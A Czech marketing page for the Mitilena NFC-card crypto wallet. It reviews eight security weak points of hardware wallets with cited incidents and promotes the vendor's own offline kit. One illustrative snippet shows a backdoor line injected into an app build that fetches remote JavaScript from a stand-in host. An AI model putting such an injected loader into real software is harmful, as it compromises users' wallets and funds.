8 skulin Open source Checklist FAQ
Mitilena Mitilena Wallet Studená kryptopeněženka
ONLINE · 22,000+ COINS Vytvořit peněženkuVytvořit
Hardwarové peněženky · neocividné skuliny

Neocividné skuliny hardwarové peněženky

Kupujete zařízení, abyste zavřeli díry. S ním přijdou nové: firmware, aktualizace, služba na počítači, displej, krabice, účet u výrobce. Osm detailů, které recenze berou za výhody — a osm cest, kterými přes ně v letech 2020–2026 odešly peníze.

Reálné případy s daty a částkami Z dokumentace výrobců Stejným seznamem hodnotíme i naši sadu
Cena chybyveřejné případy
2026Coldcard · slabá náhodnost ve firmwaru$100M+
2025Bybit · podepisující potvrdili, co neviděli$1.5B
2024Dark Skippy · seed uniká přes dva podpisyvýzkum
2023Ledger Connect Kit · zadní vrátka v knihovně$600K
2021Falešná peněženka v App Store17,1 BTC
2020Únik DB zákazníků Ledger · phishing roky270 000 lidí
Osm skulin

Každý detail, který recenze chválí, je samostatná díra

Hardwarová peněženka zavře jednu díru: klíč už nesedí na telefonu s internetem. Ale zařízení není prázdné. Má firmware, aktualizace, desktopový program, displej, krabici, prodejce s vaší adresou — a každý detail přidává povrch útoku, který jste předtím neměli. Níže je osm takových detailů: co říkají recenze, jak přes ně odešly peníze, jak skulinu zavřít a jestli ji naše sada má.

Skulina 01

Firmware, který tvoří váš klíč

V recenzích: „bezpečný čip — klíč vzniká uvnitř zařízení a nikdy ho neopustí“

Klíč je obří náhodné číslo a dělá ho firmware. Jedna chyba tam — a klíčů je mnohem méně, než si myslíte: bruteforcují se přes všechny majitele najednou, bez přístupu k zařízení, roky po nákupu. Čip je jedno; díra sedí nad ním.

Incident
$100M+
Coldcard, červenec 2026: chyba sestavení firmwaru od roku 2021 potichu nahradila hardwarový RNG slabým, seedovaným ze sériového čísla zařízení a časovače. Síla klíče klesla zhruba na 40 bitů; vybráno bylo 5 000+ adres.
Jak skulinu zavřít
Můžete si přinést vlastní náhodnost: kostky, vlastní frázi. Peněženka, která přijme entropii od vás, nezávisí na jedné chybě firmwaru.
Tento detail nemáme
Na kartě žádný firmware není — je to šifrovaný nosič. Mitilena Air tvoří klíč ze systémového RNG zařízení a místo náhodných slov můžete nastavit vlastní seed frázi.
Skulina 02

Aktualizace, které musíte instalovat

V recenzích: „výrobce pravidelně posílá bezpečnostní aktualizace“

Každá aktualizace je okamžik, kdy lze firmware podstrčit. Upravený firmware schová fragmenty seedu do dvou tří obyčejných podpisů, zatímco zařízení zvenku vypadá normálně. Aktualizace nevynecháte: díry se záplatují právě jimi.

Incident
2 podpisy
Dark Skippy, srpen 2024: výzkumníci ukázali, že škodlivý firmware hardwarové peněženky dokáže vytáhnout celý seed přes dvě transakce. Stačí jedna aktualizace z nesprávného místa.
Jak skulinu zavřít
Odkud firmware pochází a jestli zařízení ověřuje jeho podpis. Nejlepší je, když není co aktualizovat.
Tento detail nemáme
Na kartě není co aktualizovat ani podstrčit. Podpis probíhá v telefonní aplikaci; její sestavení jsou podepsaná a přicházejí z App Store a Google Play — jako jakákoli aplikace, kterou vidíte a sami zavřete.
Skulina 03 · Pocítíte absurditu
V recenzích: „pohodlná desktopová aplikace výrobce“

Peněženka pro nedůvěru, která přijde s běžící službou na pozadí

Zařízení kupujete z jednoho důvodu: přestat věřit počítači. Aby fungovalo, musíte na ten samý počítač nainstalovat službu na pozadí. Nenapsali jste ji, nespustili a neřídíte: startuje s OS, poslouchá na portu, na který může sáhnout jakýkoli program na stroji, a právě teď něco dělá — co přesně, nevíte a nikdy neověříte.

Po zavření peněženky běžela dál na pozadí. Roky. U jednoho z největších výrobců to byla samostatná služba „bridge“; v roce 2025 ji schovali dovnitř aplikace — služba pořád je, jen umírá s oknem. U většiny ostatních je zařízení bez desktopového programu jen přívěsek. Na Linuxu přidejte udev pravidla, jinak systém USB nepředá.

Takže věc, kterou jste koupili, abyste nezáviseli na programech v počítači, bez programu v počítači nefunguje. A ne ten, který vidíte — ten, který běží pod ním.

Tento detail nemáme
Na počítači se nic neinstaluje: žádná služba, ovladač ani port. Prostředník je NFC čip už v telefonu, od jeho výrobce a pod OS: funguje jen když je aplikace otevřená a kartu přiložíte sami, a telefon se pokaždé ptá na oprávnění. Karta je pasivní: bez baterie, bez rádia, sama nic nedělá. Zavřete aplikaci — nezůstane nic, co by běželo bez vás. Upřímně: telefonní aplikace je pořád potřeba a je jako každá jiná — vidíte ji, spouštíte a sami zavíráte. V komůrce nikdo nebydlí.
Systémový monitorPENĚŽENKA ZAVŘENA
ProcesStavBěží
HW Wallet Appwallet
zavřeno vámi-
hwwalletdslužba na pozadí · USB bridge
běží412d 06:14
spuštěno systémem při přihlášenínelze zavřít — je to služba
Maketa; jména jsou ilustrativní. Tak vypadal počítač s jednou z nejpopulárnějších USB peněženek před rokem 2025; pak „bridge“ zabudovali do aplikace — stejná služba, jen už není ve výpisu.
Alegorie
Dům pro soukromí — a nájemník v komůrce

Chtěli jste dům pro soukromí. Koupili jste ho. Pak jste potřebovali ostrahu — nainstalováno. A aby plán ostrahy fungoval, požádali vás, abyste do domu pustili člověka v uniformě, který bydlí ve vaší komůrce nonstop, drží klíče ke všem dveřím a hlásí se někomu jinému. Nenajali jste ho, nemůžete ho vyhodit a co dělá v noci — nevíte.

Je „náš“, samozřejmě. Stojí to ve smlouvě. Chtěli jste soukromí a dostali jste náhražku: dům s nájemníkem, kterého jste si nevybrali.

Skulina 04 · Open source není audit
V recenzích: „open source — kdokoli může ověřit“

Open source je způsob, jak programátoři spolupracují, ne odznak, že program nekrade

Open source vznikl, aby lidé mohli sdílet programy a společně je opravovat. Jako nástroj spolupráce je skvělý. Nikdy to nebyla pečeť kvality „tento software vám neukradne peníze“, a tady proč: nepoužíváte zdrojový kód. Používáte to, co jste stáhli.

Mezi GitHub repozitářem a souborem v telefonu stojí sestavení, obchod s aplikacemi, aktualizace, server. Na kterémkoli z těchto kroků může do kódu vstoupit jedna řádka, která si stáhne cokoli odkudkoli — a v repu nebude. Kopii se zdrojem nesrovnáte: obchody posílají zkompilovaný soubor; webová peněženka dostane, co vám dnes server naservíroval; rozšíření prohlížeče se tiše aktualizuje v noci.

„Otevřené“ znamená, že někteří lidé můžou někdy zkontrolovat nějakou verzi. Co dělá vaše kopie právě teď — to neznamená.

V repu · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Ve vašem telefonu · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Jedna řádka ve sestavení. Není v repu, v obchodě neviditelná, běží na vašem zařízení.
Otevřenost nezastavila žádný z těchto případů
Ledger Connect Kit2023
otevřená knihovna na GitHubu; škodlivá verze vyšla na npm; desítky webů ji načetly živě během hodin
Copay / event-stream2018
otevřená peněženka; zadní vrátka přišla přes závislost mířenou přímo na ni
xz utils2024
otevřené dvacet let; zadní vrátka seděla v releaselích, dokud jeden inženýr nezaznamenal, že SSH login je o půl sekundy pomalejší
Coldcard2026
open-source firmware; chyba sestavení pět let nahrazovala hardwarový RNG slabým — klíče bruteforcované bez přístupu k zařízení, 5 000+ adres, $100M+
Co opravdu funguje
Ne čtení cizího kódu — dvě kontroly, které zvládne kdokoli. Za prvé audit chování: dejte na počítač zachytávací proxy, pusťte aplikaci přes něj a sledujte, co kam posílá. Kód číst nemusíte — provoz je plně vidět. Za druhé architektura, kde kód nemá co ukrást: pokud klíč nikdy nesedí na zařízení se sítí, jakákoli řádka v jakékoli aktualizaci je bezmocná — nemá co odeslat.
Jak to děláme my
První nabízíme sami: pusťte naši aplikaci přes proxy, webovou verzi přes DevTools prohlížeče a prohlédněte každý request. Podepisovací klíč a seed se neobjeví; jediná výhrada je Monero view key — popsaný na stránce „jak odchází převod“. Druhé je v sadě: klíč se rodí v Mitilena Air na zařízení bez internetu, žije na kartě a do online aplikace dorazí jen podpis — na proxy tam už není co chytat. A offline tady je opravdové: v air-gap režimu není zař��zení s klíčem k ničemu připojené — žádný kabel, žádný Bluetooth; transakce přijde a odejde jako QR kód, který vidíte očima. Ne „studená“ peněženka na kabelu visící z online počítače s vlastní službou, která si vyměňuje kdovíco.
Skulina 05

Displej, na kterém nevidíte, co podepisujete

V recenzích: „potvrďte na displeji zařízení — virus v počítači je bezmocný“

Displej je malý a často ukazuje hash nebo „contract call“, ne adresu a částku. Potvrzujete, co nevidíte — a podpis je přesto poctivý, váš. Displej dává pocit kontroly, která tam není.

Incident
$1.5B
Bybit, únor 2025: podepisující s hardwarovými peněženkami potvrdili převod, který v UI vypadal obyčejně. Zařízení ukazovala data, která člověk nemohl ověřit.
Jak skulinu zavřít
Příjemce, částka a typ operace lidskou řečí — ne hash — a odmítnutí jedním tlačítkem.
Jak to děláme my
Displej je, ale je to displej telefonu: adresa, částka a typ požadavku slovy — převod, volání kontraktu, schválení — a tlačítko Reject. U velkých částek — oddělené offline zařízení, které dostane celou transakci.
Skulina 06

Krabice, ve které už je seed

V recenzích: „dorazí v zapečetěné krabici s bezpečnostní pečetí“

Fyzické zařízení znamená dopravu, prostředníky a „slevové“ tržiště. Peněženka přijde přednastavená, se seedem na lístečku uvnitř. Nebo vypadající stejně aplikace v obchodě vás vyzve „zadejte seed pro aktivaci“.

Incident
17,1 BTC
App Store, 2021: majitel hardwarové peněženky zadal seed do vypadající stejně aplikace a přišel o 17,1 BTC. Téhož roku, po úniku DB, dostávali zákazníci Ledger falešná zařízení s dopisem „přesuňte seed do nového“.
Jak skulinu zavřít
Inicializujte sami a nikdy nepoužívejte seed, který už dorazil napsaný. Pečeť není ověření; ověření je, že klíč tvoříte vy.
Jak to děláme my
Karty dorazí prázdné: klíč tvoříte a zapisujete sami — hotový seed v krabici být nemůže. Aplikace jde jen z App Store a Google Play přes odkazy na webu; o seed žádá jen při importu a podpisu.
Skulina 07

Účet u výrobce

V recenzích: „oficiální záruka, podpora a osobní účet“

Abyste zařízení koupili, dáte výrobci jméno, e-mail a doručovací adresu. Vaše bezpečnost teď závisí na jejich databázi. Když unikne — roky budete dostávat zprávy „potvrďte seed na novém zařízení“, někdy i s balíčky.

Incident
270 000 lidí
Ledger, 2020: unikla data 270 000 kupujících včetně poštovních adres. E-maily, hovory a balíčky s výzvou „migrovat“ seed jdou dodnes.
Jak skulinu zavřít
Čím méně o vás vědí, tím kratší vektor: nákup bez účtu, podpora, která nikdy nežádá seed, a pravidlo „o seed žádá jen zloděj“.
Tento detail nemáme
Peněženka funguje bez registrace — bez účtu. Prodejce zná jen doručovací adresu. Ani podpora, ani aplikace o seed nežádají.
Skulina 08

Jedno zařízení a jeden lísteček

V recenzích: „odolné tělo, velký displej, baterie na týden“

Čím víc součástek, tím víc se lámou: konektor, displej, baterie. Obnova visí na jednom lístečku se seedem — namočený, ztracený při stěhování, vyfocený „pro jistotu“. Nejčastější příčina ztráty není hack.

Incident
≈20 % BTC
Chainalysis odhaduje, že asi pětina veškerého bitcoinu je navždy ztracená — většinou kvůli ztraceným klíčům, ne hackům.
Jak skulinu zavřít
Kolik kopií klíče je v krabici a v jaké formě, co když zařízení ztratíte a jestli je v něm něco, co se může rozbít.
Tento detail nemáme
Žádný displej, baterie ani konektor — není co rozbít. A ne jedna kopie: pět zrcadlových kopií v krabici — dvě NFC karty a tři stealth nálepky ve voděodolném plastu, 10+ let.
Checklist

Co v peněžence být nemá

Osm detailů pro osm skulin. Seznam sedí na jakoukoli peněženku — hardwarovou, mobilní, prohlížečovou. Zaškrtněte, co má ta, kterou vybíráte — i ta naše.

01
Klíč tvořený jen softwarembez vaší vlastní náhodnosti — fráze nebo kostky
02
Aktualizace tam, kde žije klíčkaždá aktualizace je šance podstrčit kód
03
Služba, ovladač nebo port na počítačiviz skulina 03
04
Odznak „open source“ místo architekturyklíč sedí tam, kam dosáhne cizí kód
05
Displej, který ukazuje hash místo adresy a částkya bez tlačítka Reject
06
Seed, který už dorazil napsanýv krabici, v dopise, v „aktivační aplikaci“
07
Účet u výrobcea podpora, která může žádat seed
08
Jediná kopie a součástky, které se lámoudisplej, baterie, konektor, jeden lísteček
Na tomto seznamu Ultimate sada nemá žádný z osmi detailů. V krabici: 2 NFC karty a 3 stealth nálepky, Mitilena Air (klíče bez internetu) a Mitilena Keys (podpis bez internetu). Karty dorazí prázdné: klíč tvoříte a šifrujete vy — ne tovární čip. Obsah a cena →
Ultimate · offline sada

Ne tovární „bezpečný čip“ — nosič, který šifrujete vy

Karty dorazí prázdné. Klíč tvoříte v Mitilena Air na telefonu bez internetu a zapisujete sami. Podpis jde přes Mitilena Keys, také offline: transakce cestuje QR. Pět stejných kopií v krabici: 2 NFC karty a 3 stealth nálepky ve voděodolném plastu. 18 sítí, 20 000+ mincí včetně USDT.

Na počítači se nic neinstaluje
Žádný firmware, aktualizace, displej ani baterie
Transakce na offline telefon — zvukem nebo QR, bez kabelu a USB
Funguje s bezplatnou telefonní aplikací Mitilena
Voděodolný plast, životnost 10+ let
Doprava po světě · cz.mitilena-store.com
NFC karta Mitilena
Ultimate · offline generování a podpis
8 990 Kč€439
2 NFC karty · 3 stealth nálepky · Mitilena Air · licence Mitilena Keys
Koupit Ultimate · 8 990 Kč Basic a Premium — všechny tarify
FAQ

Co se lidé ptají, když dočetli až sem

Hardwarová peněženka výhody a nevýhody — krátce?

Jedno velké plus: klíč není na telefonu s internetem. Minusy jsou osm detailů výše — každý přidává povrch útoku. Dobrá hardwarová peněženka je ta s méně detaily, ne s více.

Co když je telefon kompromitovaný?

S kartou na hlavním telefonu se klíč objeví v izolovaném prostředí na vteřinu podpisu — stejné riziko jako u jakékoli telefonní peněženky, jen kratší. U částek, které vás děsí — druhá vrstva: podpis na odděleném offline zařízení, kam transakce dorazí QR.

Co když kartu ukradnou nebo ztratíte?

Bez hesla jsou karta i nálepka bezcenný plast — klíč na nich je šifrovaný. Ztracenou kopii nahradí zbylé čtyři: dvě karty a tři nálepky z krabice jsou zrcadla.

Musíte aktualizovat firmware hardwarové peněženky?

Když výrobce zavřel díru — ano, a právě tehdy lze firmware podstrčit: kontrolujte zdroj a podpis. Nosič bez firmwaru takovou volbu nemá — není co aktualizovat, není co podstrčit.

Jak se to liší od USB peněženky?

Méně prostředníků: žádný kabel, ovladač, služba na pozadí ani desktopový program. Jeden prostředník — NFC čip vašeho telefonu — a odpovídá vám a OS, ne výrobci peněženky.

Open source znamená bezpečné?

Znamená to, že to někdy někdo může zkontrolovat. Neužíváte kód, ale to, co jste stáhli, a jedno s druhým nesrovnáte. Bezpečnost jde z architektury, kde klíč není tam, kam dosáhne cizí kód.

NFC karty s offline generováním a podpisem

5 kopií klíče · Air · Keys · nebo bezplatná peněženka za 30 sekund · Proč je „studená“ hardwarová peněženka na továrním čipu často falešná →
Koupit Ultimate · 8 990 Kč Vytvořit bezplatnou peněženku